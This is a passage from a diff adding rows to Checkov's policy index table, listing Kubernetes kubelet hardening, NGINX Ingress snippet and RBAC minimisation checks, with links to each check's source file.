+| 3633 | CKV_K8S_141              | resource                         | ReplicationController                                                                            | Ensure that the --read-only-port argument is set to 0                                                                                                                                                    | Kubernetes              | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py)                                                                                        |
+| 3634 | CKV_K8S_141              | resource                         | StatefulSet                                                                                      | Ensure that the --read-only-port argument is set to 0                                                                                                                                                    | Kubernetes              | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py)                                                                                        |
+| 3635 | CKV_K8S_143              | resource                         | CronJob                                                                                          | Ensure that the --streaming-connection-idle-timeout argument is not set to 0                                                                                                                             | Kubernetes              | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py)                                                    |
+| 3636 | CKV_K8S_143              | resource                         | DaemonSet                                                                                        | Ensure that the --streaming-connection-idle-timeout argument is not set to 0                                                                                                                             | Kubernetes              | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py)                                                    |
+| 3637 | CKV_K8S_143              | resource                         | Deployment                                                                                       | Ensure that the --streaming-connection-idle-timeout argument is not set to 0                                                                                                                             | Kubernetes              | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py)                                                    |
+| 3638 | CKV_K8S_143              | resource                         | DeploymentConfig                                                                                 | Ensure that the --streaming-connection-idle-timeout argument is not set to 0                                                                                                                             | Kubernetes              | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py)                                                    |
+| 3639 | CKV_K8S_143              | resource                         | Job                                                                                              | Ensure that the --streaming-connection-idle-timeout argument is not set to 0                                                                                                                             | Kubernetes              | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py)                                                    |
+| 3640 | CKV_K8S_143              | resource                         | Pod                                                                                              | Ensure that the --streaming-connection-idle-timeout argument is not set to 0                                                                                                                             | Kubernetes              | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py)                                                    |
+| 3641 | CKV_K8S_143              | resource                         | PodTemplate                                                                                      | Ensure that the --streaming-connection-idle-timeout argument is not set to 0                                                                                                                             | Kubernetes              | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py)                                                    |
+| 3642 | CKV_K8S_143              | resource                         | ReplicaSet                                                                                       | Ensure that the --streaming-connection-idle-timeout argument is not set to 0                                                                                                                             | Kubernetes              | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py)                                                    |
+| 3643 | CKV_K8S_143              | resource                         | ReplicationController                                                                            | Ensure that the --streaming-connection-idle-timeout argument is not set to 0                                                                                                                             | Kubernetes              | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py)                                                    |
+| 3644 | CKV_K8S_143              | resource                         | StatefulSet                                                                                      | Ensure that the --streaming-connection-idle-timeout argument is not set to 0                                                                                                                             | Kubernetes              | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py)                                                    |
+| 3645 | CKV_K8S_144              | resource                         | CronJob                                                                                          | Ensure that the --protect-kernel-defaults argument is set to true                                                                                                                                        | Kubernetes              | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py)                                                                      |
+| 3646 | CKV_K8S_144              | resource                         | DaemonSet                                                                                        | Ensure that the --protect-kernel-defaults argument is set to true                                                                                                                                        | Kubernetes              | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py)                                                                      |
+| 3647 | CKV_K8S_144              | resource                         | Deployment                                                                                       | Ensure that the --protect-kernel-defaults argument is set to true                                                                                                                                        | Kubernetes              | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py)                                                                      |
+| 3648 | CKV_K8S_144              | resource                         | DeploymentConfig                                                                                 | Ensure that the --protect-kernel-defaults argument is set to true                                                                                                                                        | Kubernetes              | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py)                                                                      |
+| 3649 | CKV_K8S_144              | resource                         | Job                                                                                              | Ensure that the --protect-kernel-defaults argument is set to true                                                                                                                                        | Kubernetes              | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py)                                                                      |
+| 3650 | CKV_K8S_144              | resource                         | Pod                                                                                              | Ensure that the --protect-kernel-defaults argument is set to true                                                                                                                                        | Kubernetes              | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py)                                                                      |
+| 3651 | CKV_K8S_144              | resource                         | PodTemplate                                                                                      | Ensure that the --protect-kernel-defaults argument is set to true                                                                                                                                        | Kubernetes              | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py)                                                                      |
+| 3652 | CKV_K8S_144              | resource                         | ReplicaSet                                                                                       | Ensure that the --protect-kernel-defaults argument is set to true                                                                                                                                        | Kubernetes              | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py)                                                                      |
+| 3653 | CKV_K8S_144              | resource                         | ReplicationController                                                                            | Ensure that the --protect-kernel-defaults argument is set to true                                                                                                                                        | Kubernetes              | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py)                                                                      |
+| 3654 | CKV_K8S_144              | resource                         | StatefulSet                                                                                      | Ensure that the --protect-kernel-defaults argument is set to true                                                                                                                                        | Kubernetes              | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py)                                                                      |
+| 3655 | CKV_K8S_145              | resource                         | CronJob                                                                                          | Ensure that the --make-iptables-util-chains argument is set to true                                                                                                                                      | Kubernetes              | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py)                                                                    |
+| 3656 | CKV_K8S_145              | resource                         | DaemonSet                                                                                        | Ensure that the --make-iptables-util-chains argument is set to true                                                                                                                                      | Kubernetes              | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py)                                                                    |
+| 3657 | CKV_K8S_145              | resource                         | Deployment                                                                                       | Ensure that the --make-iptables-util-chains argument is set to true                                                                                                                                      | Kubernetes              | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py)                                                                    |
+| 3658 | CKV_K8S_145              | resource                         | DeploymentConfig                                                                                 | Ensure that the --make-iptables-util-chains argument is set to true                                                                                                                                      | Kubernetes              | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py)                                                                    |
+| 3659 | CKV_K8S_145              | resource                         | Job                                                                                              | Ensure that the --make-iptables-util-chains argument is set to true                                                                                                                                      | Kubernetes              | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py)                                                                    |
+| 3660 | CKV_K8S_145              | resource                         | Pod                                                                                              | Ensure that the --make-iptables-util-chains argument is set to true                                                                                                                                      | Kubernetes              | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py)                                                                    |
+| 3661 | CKV_K8S_145              | resource                         | PodTemplate                                                                                      | Ensure that the --make-iptables-util-chains argument is set to true                                                                                                                                      | Kubernetes              | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py)                                                                    |
+| 3662 | CKV_K8S_145              | resource                         | ReplicaSet                                                                                       | Ensure that the --make-iptables-util-chains argument is set to true                                                                                                                                      | Kubernetes              | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py)                                                                    |
+| 3663 | CKV_K8S_145              | resource                         | ReplicationController                                                                            | Ensure that the --make-iptables-util-chains argument is set to true                                                                                                                                      | Kubernetes              | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py)                                                                    |
+| 3664 | CKV_K8S_145              | resource                         | StatefulSet                                                                                      | Ensure that the --make-iptables-util-chains argument is set to true                                                                                                                                      | Kubernetes              | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py)                                                                    |
+| 3665 | CKV_K8S_146              | resource                         | CronJob                                                                                          | Ensure that the --hostname-override argument is not set                                                                                                                                                  | Kubernetes              | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py)                                                                                |
+| 3666 | CKV_K8S_146              | resource                         | DaemonSet                                                                                        | Ensure that the --hostname-override argument is not set                                                                                                                                                  | Kubernetes              | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py)                                                                                |
+| 3667 | CKV_K8S_146              | resource                         | Deployment                                                                                       | Ensure that the --hostname-override argument is not set                                                                                                                                                  | Kubernetes              | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py)                                                                                |
+| 3668 | CKV_K8S_146              | resource                         | DeploymentConfig                                                                                 | Ensure that the --hostname-override argument is not set                                                                                                                                                  | Kubernetes              | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py)                                                                                |
+| 3669 | CKV_K8S_146              | resource                         | Job                                                                                              | Ensure that the --hostname-override argument is not set                                                                                                                                                  | Kubernetes              | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py)                                                                                |
+| 3670 | CKV_K8S_146              | resource                         | Pod                                                                                              | Ensure that the --hostname-override argument is not set                                                                                                                                                  | Kubernetes              | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py)                                                                                |
+| 3671 | CKV_K8S_146              | resource                         | PodTemplate                                                                                      | Ensure that the --hostname-override argument is not set                                                                                                                                                  | Kubernetes              | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py)                                                                                |
+| 3672 | CKV_K8S_146              | resource                         | ReplicaSet                                                                                       | Ensure that the --hostname-override argument is not set                                                                                                                                                  | Kubernetes              | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py)                                                                                |
+| 3673 | CKV_K8S_146              | resource                         | ReplicationController                                                                            | Ensure that the --hostname-override argument is not set                                                                                                                                                  | Kubernetes              | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py)                                                                                |
+| 3674 | CKV_K8S_146              | resource                         | StatefulSet                                                                                      | Ensure that the --hostname-override argument is not set                                                                                                                                                  | Kubernetes              | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py)                                                                                |
+| 3675 | CKV_K8S_147              | resource                         | CronJob                                                                                          | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture                                                                                                      | Kubernetes              | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py)                                                                                          |
+| 3676 | CKV_K8S_147              | resource                         | DaemonSet                                                                                        | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture                                                                                                      | Kubernetes              | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py)                                                                                          |
+| 3677 | CKV_K8S_147              | resource                         | Deployment                                                                                       | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture                                                                                                      | Kubernetes              | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py)                                                                                          |
+| 3678 | CKV_K8S_147              | resource                         | DeploymentConfig                                                                                 | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture                                                                                                      | Kubernetes              | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py)                                                                                          |
+| 3679 | CKV_K8S_147              | resource                         | Job                                                                                              | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture                                                                                                      | Kubernetes              | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py)                                                                                          |
+| 3680 | CKV_K8S_147              | resource                         | Pod                                                                                              | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture                                                                                                      | Kubernetes              | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py)                                                                                          |
+| 3681 | CKV_K8S_147              | resource                         | PodTemplate                                                                                      | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture                                                                                                      | Kubernetes              | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py)                                                                                          |
+| 3682 | CKV_K8S_147              | resource                         | ReplicaSet                                                                                       | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture                                                                                                      | Kubernetes              | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py)                                                                                          |
+| 3683 | CKV_K8S_147              | resource                         | ReplicationController                                                                            | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture                                                                                                      | Kubernetes              | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py)                                                                                          |
+| 3684 | CKV_K8S_147              | resource                         | StatefulSet                                                                                      | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture                                                                                                      | Kubernetes              | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py)                                                                                          |
+| 3685 | CKV_K8S_148              | resource                         | CronJob                                                                                          | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py)                                                                    |
+| 3686 | CKV_K8S_148              | resource                         | DaemonSet                                                                                        | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py)                                                                    |
+| 3687 | CKV_K8S_148              | resource                         | Deployment                                                                                       | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py)                                                                    |
+| 3688 | CKV_K8S_148              | resource                         | DeploymentConfig                                                                                 | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py)                                                                    |
+| 3689 | CKV_K8S_148              | resource                         | Job                                                                                              | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py)                                                                    |
+| 3690 | CKV_K8S_148              | resource                         | Pod                                                                                              | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py)                                                                    |
+| 3691 | CKV_K8S_148              | resource                         | PodTemplate                                                                                      | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py)                                                                    |
+| 3692 | CKV_K8S_148              | resource                         | ReplicaSet                                                                                       | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py)                                                                    |
+| 3693 | CKV_K8S_148              | resource                         | ReplicationController                                                                            | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py)                                                                    |
+| 3694 | CKV_K8S_148              | resource                         | StatefulSet                                                                                      | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py)                                                                    |
+| 3695 | CKV_K8S_149              | resource                         | CronJob                                                                                          | Ensure that the --rotate-certificates argument is not set to false                                                                                                                                       | Kubernetes              | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py)                                                                              |
+| 3696 | CKV_K8S_149              | resource                         | DaemonSet                                                                                        | Ensure that the --rotate-certificates argument is not set to false                                                                                                                                       | Kubernetes              | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py)                                                                              |
+| 3697 | CKV_K8S_149              | resource                         | Deployment                                                                                       | Ensure that the --rotate-certificates argument is not set to false                                                                                                                                       | Kubernetes              | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py)                                                                              |
+| 3698 | CKV_K8S_149              | resource                         | DeploymentConfig                                                                                 | Ensure that the --rotate-certificates argument is not set to false                                                                                                                                       | Kubernetes              | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py)                                                                              |
+| 3699 | CKV_K8S_149              | resource                         | Job                                                                                              | Ensure that the --rotate-certificates argument is not set to false                                                                                                                                       | Kubernetes              | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py)                                                                              |
+| 3700 | CKV_K8S_149              | resource                         | Pod                                                                                              | Ensure that the --rotate-certificates argument is not set to false                                                                                                                                       | Kubernetes              | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py)                                                                              |
+| 3701 | CKV_K8S_149              | resource                         | PodTemplate                                                                                      | Ensure that the --rotate-certificates argument is not set to false                                                                                                                                       | Kubernetes              | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py)                                                                              |
+| 3702 | CKV_K8S_149              | resource                         | ReplicaSet                                                                                       | Ensure that the --rotate-certificates argument is not set to false                                                                                                                                       | Kubernetes              | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py)                                                                              |
+| 3703 | CKV_K8S_149              | resource                         | ReplicationController                                                                            | Ensure that the --rotate-certificates argument is not set to false                                                                                                                                       | Kubernetes              | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py)                                                                              |
+| 3704 | CKV_K8S_149              | resource                         | StatefulSet                                                                                      | Ensure that the --rotate-certificates argument is not set to false                                                                                                                                       | Kubernetes              | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py)                                                                              |
+| 3705 | CKV_K8S_151              | resource                         | CronJob                                                                                          | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers                                                                                                                                   | Kubernetes              | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py)                                                                        |
+| 3706 | CKV_K8S_151              | resource                         | DaemonSet                                                                                        | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers                                                                                                                                   | Kubernetes              | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py)                                                                        |
+| 3707 | CKV_K8S_151              | resource                         | Deployment                                                                                       | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers                                                                                                                                   | Kubernetes              | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py)                                                                        |
+| 3708 | CKV_K8S_151              | resource                         | DeploymentConfig                                                                                 | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers                                                                                                                                   | Kubernetes              | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py)                                                                        |
+| 3709 | CKV_K8S_151              | resource                         | Job                                                                                              | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers                                                                                                                                   | Kubernetes              | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py)                                                                        |
+| 3710 | CKV_K8S_151              | resource                         | Pod                                                                                              | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers                                                                                                                                   | Kubernetes              | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py)                                                                        |
+| 3711 | CKV_K8S_151              | resource                         | PodTemplate                                                                                      | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers                                                                                                                                   | Kubernetes              | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py)                                                                        |
+| 3712 | CKV_K8S_151              | resource                         | ReplicaSet                                                                                       | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers                                                                                                                                   | Kubernetes              | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py)                                                                        |
+| 3713 | CKV_K8S_151              | resource                         | ReplicationController                                                                            | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers                                                                                                                                   | Kubernetes              | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py)                                                                        |
+| 3714 | CKV_K8S_151              | resource                         | StatefulSet                                                                                      | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers                                                                                                                                   | Kubernetes              | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py)                                                                        |
+| 3715 | CKV_K8S_152              | resource                         | Ingress                                                                                          | Prevent NGINX Ingress annotation snippets which contain LUA code execution. See CVE-2021-25742                                                                                                           | Kubernetes              | [NginxIngressCVE202125742Lua.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Lua.py)                                                                        |
+| 3716 | CKV_K8S_153              | resource                         | Ingress                                                                                          | Prevent All NGINX Ingress annotation snippets. See CVE-2021-25742                                                                                                                                        | Kubernetes              | [NginxIngressCVE202125742AllSnippets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742AllSnippets.py)                                                        |
+| 3717 | CKV_K8S_154              | resource                         | Ingress                                                                                          | Prevent NGINX Ingress annotation snippets which contain alias statements See CVE-2021-25742                                                                                                              | Kubernetes              | [NginxIngressCVE202125742Alias.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Alias.py)                                                                    |
+| 3718 | CKV_K8S_155              | resource                         | ClusterRole                                                                                      | Minimize ClusterRoles that grant control over validating or mutating admission webhook configurations                                                                                                    | Kubernetes              | [RbacControlWebhooks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacControlWebhooks.py)                                                                                        |
+| 3719 | CKV_K8S_156              | resource                         | ClusterRole                                                                                      | Minimize ClusterRoles that grant permissions to approve CertificateSigningRequests                                                                                                                       | Kubernetes              | [RbacApproveCertificateSigningRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacApproveCertificateSigningRequests.py)                                                    |
+| 3720 | CKV_K8S_157              | resource                         | ClusterRole                                                                                      | Minimize Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings                                                                                                       | Kubernetes              | [RbacBindRoleBindings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacBindRoleBindings.py)                                                                                      |
+| 3721 | CKV_K8S_157              | resource                         | Role                                                                                             | Minimize Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings                                                                                                       | Kubernetes              | [RbacBindRoleBindings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacBindRoleBindings.py)                                                                                      |
+| 3722 | CKV_K8S_158              | resource                         | ClusterRole                                                                                      | Minimize Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRoles                                                                                                                 | Kubernetes              | [RbacEscalateRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacEscalateRoles.py)                                                                                            |
+| 3723 | CKV_K8S_158              | resource                         | Role                                                                                             | Minimize Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRoles                                                                                                                 | Kubernetes              | [RbacEscalateRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacEscalateRoles.py)                                                                                            |
